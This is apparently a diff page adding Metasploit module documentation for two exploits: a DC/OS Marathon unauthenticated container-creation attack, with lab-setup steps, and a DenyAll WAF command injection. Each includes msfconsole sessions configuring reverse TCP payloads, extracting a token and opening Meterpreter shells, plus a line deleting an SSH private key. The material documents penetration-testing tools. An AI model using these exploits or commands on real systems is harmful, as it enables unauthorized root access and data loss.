rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
|
||||||
|
```
|
||||||
|
|
||||||
|
Shut down the CentOS vm, take a snapshot. (This will be your base)
|
||||||
|
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
|
||||||
|
Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
|
||||||
|
Login and get their current IP address.
|
||||||
|
* Note: I recommend giving them static IPs if you have further use for the cluster.
|
||||||
|
|
||||||
|
From here use another Linux machine with docker installed to finish
|
||||||
|
the installation process. I used an Ubuntu machine with docker installed.
|
||||||
|
|
||||||
|
Follow the custom CLI guide for creating the required files in
|
||||||
|
the genconf folder.
|
||||||
|
https://dcos.io/docs/1.8/administration/installing/custom/cli/
|
||||||
|
|
||||||
|
Example genconf/config.yaml
|
||||||
|
```
|
||||||
|
---
|
||||||
|
agent_list:
|
||||||
|
- 192.168.0.10
|
||||||
|
bootstrap_url: file:///opt/dcos_install_tmp
|
||||||
|
cluster_name: DCOS
|
||||||
|
exhibitor_storage_backend: static
|
||||||
|
ip_detect_filename: /genconf/ip-detect
|
||||||
|
master_discovery: static
|
||||||
|
master_list:
|
||||||
|
- 192.168.0.9
|
||||||
|
process_timeout: 10000
|
||||||
|
resolvers:
|
||||||
|
- 8.8.8.8
|
||||||
|
- 8.8.4.4
|
||||||
|
ssh_port: 22
|
||||||
|
ssh_user: root
|
||||||
|
```
|
||||||
|
Example genconf/ip-detect
|
||||||
|
```bash
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -o nounset -o errexit
|
||||||
|
export PATH=/usr/sbin:/usr/bin:$PATH
|
||||||
|
ip=$(ip addr show ens33)
|
||||||
|
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
|
||||||
|
```
|
||||||
|
|
||||||
|
place your id_rsa ssh key into the genconf file and rename the
|
||||||
|
file to ssh_key and `chmod 0600 genconf/ssh_key`
|
||||||
|
|
||||||
|
Deploying the cluster
|
||||||
|
in the folder containing the genconf folder do the following.
|
||||||
|
NOTE: if following the cli install from DCOS itself, it will fail
|
||||||
|
if you do --install-prereqs. It will install an unsupported version of
|
||||||
|
docker.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
|
||||||
|
chmod +x dcos_generate_config.sh
|
||||||
|
sudo ./dcos_generate_config.sh --genconf
|
||||||
|
sudo ./dcos_generate_config.sh --preflight
|
||||||
|
# If all preflight checks pass
|
||||||
|
sudo ./dcos_generate_config.sh --deploy
|
||||||
|
# get a cup of coffie
|
||||||
|
# wait a minute or two after deploy completes
|
||||||
|
sudo bash dcos_generate_config.sh --postflight
|
||||||
|
```
|
||||||
|
|
||||||
|
If all is passing navigate to http://[master_ip]:8080/
|
||||||
|
You should see the Marathon UI web application.
|
||||||
|
|
||||||
|
# Exploitation
|
||||||
|
This module is designed for the attacker to leverage, creation of a
|
||||||
|
docker container with out authentication through the DCOS Marathon UI
|
||||||
|
to gain root access to the hosting server of the docker container
|
||||||
|
in the DCOS cluster.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
|
||||||
|
- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
|
||||||
|
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
|
||||||
|
- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
|
||||||
|
|
||||||
|
## Steps to exploit with module
|
||||||
|
- [ ] Start msfconsole
|
||||||
|
- [ ] use exploit/linux/http/dcos_marathon
|
||||||
|
- [ ] Set the options appropriately and set VERBOSE to true
|
||||||
|
- [ ] Verify it creates a docker container and it successfully runs
|
||||||
|
- [ ] After a minute a session should be opened from the agent server
|
||||||
|
|
||||||
|
## Example Output
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/dcos_marathon
|
||||||
|
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
|
||||||
|
RHOST => 192.168.0.9
|
||||||
|
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
|
||||||
|
payload => python/meterpreter/reverse_tcp
|
||||||
|
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
|
||||||
|
LHOST => 192.168.0.100
|
||||||
|
msf exploit(dcos_marathon) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf exploit(dcos_marathon) > check
|
||||||
|
[*] 192.168.0.9:8080 The target appears to be vulnerable.
|
||||||
|
msf exploit(dcos_marathon) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.0.100:4444
|
||||||
|
[*] Setting container json request variables
|
||||||
|
[*] Creating the docker container command
|
||||||
|
[*] The docker container is created, waiting for it to deploy
|
||||||
|
[*] Waiting up to 60 seconds for docker container to start
|
||||||
|
[*] The docker container is running, removing it
|
||||||
|
[*] Waiting for the cron job to run, can take up to 60 seconds
|
||||||
|
[*] Sending stage (39690 bytes) to 192.168.0.10
|
||||||
|
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
|
||||||
|
[+] Deleted /etc/cron.d/FOWkTeZL
|
||||||
|
[+] Deleted /tmp/TIWpOfUR
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : localhost.localdomain
|
||||||
|
OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
|
||||||
|
Architecture : x64
|
||||||
|
System Language : en_US
|
||||||
|
Meterpreter : python/linux
|
||||||
|
meterpreter >
|
||||||
|
```
|
|
@ -0,0 +1,47 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
|
||||||
|
|
||||||
|
It's possible to have trial demo for 15 days at Amazon Marketplace.
|
||||||
|
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
|
||||||
|
|
||||||
|
You just need to follow instruction above URL.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
A successful check of the exploit will look like this:
|
||||||
|
|
||||||
|
- [ ] Start `msfconsole`
|
||||||
|
- [ ] `use use exploit/linux/http/denyall_exec`
|
||||||
|
- [ ] Set `RHOST`
|
||||||
|
- [ ] Set `LHOST`
|
||||||
|
- [ ] Run `check`
|
||||||
|
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
|
||||||
|
- [ ] Run `exploit`
|
||||||
|
- [ ] **Verify** that you are seeing `iToken` value extraction.
|
||||||
|
- [ ] **Verify** that you are getting `meterpreter` session.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/denyall_exec
|
||||||
|
msf exploit(denyall_exec) >
|
||||||
|
msf exploit(denyall_exec) > set RHOST 35.176.123.128
|
||||||
|
RHOST => 35.176.123.128
|
||||||
|
msf exploit(denyall_exec) > set LHOST 35.12.3.3
|
||||||
|
LHOST => 35.12.3.3
|
||||||
|
msf exploit(denyall_exec) > check
|
||||||
|
[*] 35.176.123.128:3001 The target appears to be vulnerable.
|
||||||
|
msf exploit(denyall_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 35.12.3.3:4444
|
||||||
|
[*] Extracting iToken value from unauthenticated accessible endpoint.
|
||||||
|
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
|
||||||
|
[*] Trigerring command injection vulnerability with iToken value.
|
||||||
|
[*] Sending stage (40411 bytes) to 35.176.123.128
|
||||||
|
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
|
||||||
|
|
||||||
|
meterpreter > pwd
|
||||||
|
/var/log/denyall/reverseproxy
|
||||||
|
meterpreter >
|
||||||
|
```
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue